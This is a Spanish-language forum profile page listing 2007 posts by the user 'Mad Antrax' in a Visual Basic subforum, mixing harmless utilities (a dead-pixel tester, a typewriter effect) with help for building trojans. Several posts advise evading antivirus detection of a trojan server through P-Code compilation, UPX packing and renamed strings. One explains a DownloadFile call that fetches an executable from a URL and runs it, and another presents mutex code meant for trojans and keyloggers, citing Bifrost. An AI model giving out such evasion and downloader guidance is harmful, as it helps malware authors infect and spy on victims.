Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - Mad Antrax

#811
Programación Visual Basic / Re: Mi "troyano"
22 Mayo 2007, 21:10 PM
O más facil: compila el server en modo P-Code, comprime el server en UPX

Aunque lo lógico es re-programar el server cambiando las Strings (todo lo que esté entre "")

Saludos!!
#812
Cita de: satan69 en 22 Mayo 2007, 05:12 AM
y en que carpeta lo guarda.. por ejemplo..

Pues es fácil... este código captura las carpetas que hay dentro de las variables globales del sistema: windir, systemroot, homedrive, userprofile, tmp, etc...

Esta explicado en los parámetros de la función:

DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)

DownloadFile "http://www.server.com/a.exe", "server.exe"

Esta función me gusrda el archivo en C:\DOCUME~1\USUARI~1\CONFIG~1\Temp\server.exe. Lo ejecuta de forma visible.

Luego juega tu mismo con los demás parámetros de la función DownloadFile.

Saludos!!
#813
Seguro que es para intentar hacer un DDoS a base de peticiones xD

Eres un malotte...  :¬¬
#814
Programación Visual Basic / Re: Mi "troyano"
20 Mayo 2007, 14:14 PM
A mi tambien me tira error
#815
Buenas, siempre me ha fascinado como algunos programadores (de troyanos y cracks o keygens), dedican unos minutos en programar sencillos efectos en sus ventanas de "About", en mi afán de intentar ponerme a su altura he programado este sencillo efecto de máquina de escribir.

Si no recuerdo mal SubSeven 2.0 usaba esta técnica, aunque a mobman (programador del Sub7) le salió mucho mejor, con colores, música y efecto de partículas. Claro que él uso C++ para programar su troyano :P

Saludos!!

#816
Cita de: E0N en 19 Mayo 2007, 19:27 PM
Seria una wena idea q algun moderador global reopilara sus codigos, verdad ||MadAntrax||

Por una simple cuestión de igualdad, no creo que sea justo que se recopilen mis sources simplemente porque tenga el "poder" de hacerlo. Si algun usuario quiere mis sources solo tiene que usar el buscador y filtrar por mi usuario en el subforo de VB, no?

Saludos!!
#817
Cita de: sp26 en 19 Mayo 2007, 19:08 PM
Si te das cuenta, al guardar ese codigo en un Modulo BAS y lo guardas (No copilar), los antivirus lo detectan como Troyano.

Si quieres haz la prueba y subelo a VirusTotal.

Sí, es cierto ,esto ocurre porque los objectos Microsoft.XMLHTTP y ADODB.Stream pueden usarse en archivos VBScripting (como en VBS, VBE, HTML, etc...) permitiendo crear un downloader en texto plano, por eso algunos AntiVirus detectará en código fuente como "virus".

Pero no te preocupes por eso, si lo compilas (creas el EXE) los Antivirus por ahora no lo detectan, y siempre puedes terminar comprimiendo tu ejecutable en UPX o compilando a P-Code para dificultar su detección.

Saludos!!
#818
Bueno, hace una semana me he comprado un monitor LCD de 21 pulgadas :rolleyes: y quería saber si tenia algún pixel muerto (que últimamente los fabricantes pasan de los pixeles muertos).

Así que he programado una sencilla utilidad que pone el monitor en todos los colores posibles, permitiendo ver si tienes algún pixel defectuoso, he escogido estos valores:


RGB(255, 255, 255)
RGB(255, 255, 0)
RGB(255, 0, 255)
RGB(255, 0, 0)
RGB(0, 255, 255)
RGB(0, 255, 0)
RGB(0, 0, 255)
RGB(0, 0, 0)


Su uso es sencillo, ejecuta el programa y la pantalla se pondrá en blanco, mira si tiene algun pixel muerto... Para pasar a otro color haz click con el ratón o simplemente pulsa la tecla "Espacio" o "Enter". Si quieres cancelar el proceso y salir en cualquier momento pulsa "Esc" o espera a llegar al color negro.




La idea no es 100% mía, ví un código similar en pscode.com

Os dejo el source (no lo he comentado porque es muy simple) y una versión compilada para quien quiera probarlo sin usar el VisualBasic6

Saludos!! :xD
#819
Aqui vuelve el pesao de MadAntrax con otro de sus códigos...

Esta vez sirve para controlar que nuestra aplicación no sea ejecutada 2 veces en un mismo equipo. Algunos pensareis que eso ya se puede hacer con

Código (vb) [Seleccionar]
If App.PrevInstance = True Then End

pero eso no es cierto... si nuestra aplicación se copia en System32 como: programa1.exe y programa2.exe... el usuario podrá ejecutar el programa1.exe y el programa2.exe simultáneamente! Eso puede suponer un problema en el caso de estar programando un troyano o un keylogger (donde lo importante es solo tener una instancia de nuestro malware a la vez).

Si no recuerdo mal, el troyano Bifrost usa esta función para controlar que solo un server.exe esté ejecutándose a la vez en un mismo sistema, y si la memoria no me falla este Mutex se puede personalizar en el EditServer. Bien, como creo yo una función similar en VB, así de simple:

Module1.bas
Código (vb) [Seleccionar]

'Estas sin las API's necesarias para crear y controlar el Mutex
Private Declare Function CreateMutex Lib "kernel32" Alias "CreateMutexA" (ByVal lpMutexAttributes As Long, ByVal bInitialOwner As Long, ByVal lpName As String) As Long
Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long

'Variable Global que almacena el Handle de nuestro Mutex
Private hMutex As Long

''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
' IsMutexRunning Parametros:
'   MutexStr = String
'       Cadena de texto única que usaremos para controlar nuestro Mutex
'
'   Valor de retorno = Boolean
'       Devuelve TRUE si existe el Mutex
'       Devuleve FALSE si no encuentra el Mutex
''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''

Public Function IsMutexRunning(ByVal MutexStr As String) As Boolean
    hMutex = CreateMutex(0&, 0&, MutexStr)              'Creamos nuestro Mutex único
    If hMutex = 0 Then                                  'Si el Handle es 0 es que algo no va bien :S
        MsgBox "Ha ocurrido un error al intentar crear el Mutex. Es imposible controlar las instancias de este proceso", vbCritical + vbOKOnly, "CreateMutex Error"
        IsMutexRunning = False
    Else
        If WaitForSingleObject(hMutex, 0&) = &H0 Then   'Comprobamos si ya existe ese Handle
            IsMutexRunning = False                      'Si no existe, devolvemos FALSE
        Else
            MsgBox "Solo se permite una instancia simultanea de este proceso", vbOKOnly, "CreateMutex"
            CloseHandle hMutex                          'Si existe, cerramos el nuevo Handle
            IsMutexRunning = True                       'Y devolvemos TRUE
        End If
    End If
End Function


y el el Form1.frm...
Código (vb) [Seleccionar]
Private Sub Form_Load()
    'Evitar usar un Mutex superior a 256 carácteres
    'Recomiendo usar un Mutex poco común, asi evitamos problemas...
    If IsMutexRunning("MadAntrax_Mutex[73@]") = True Then End
End Sub


Así de simple!! os dejo un proyecto de ejemplo 100% funcional, la descarga esta habilitada solo a usuarios registrados!!

Saludos!! ;D
#820
Mira si tienes esta línea en tu proyecto y borrala:

Option Explicit

Si no, dinos en qe linea te peta y que error te devuelve!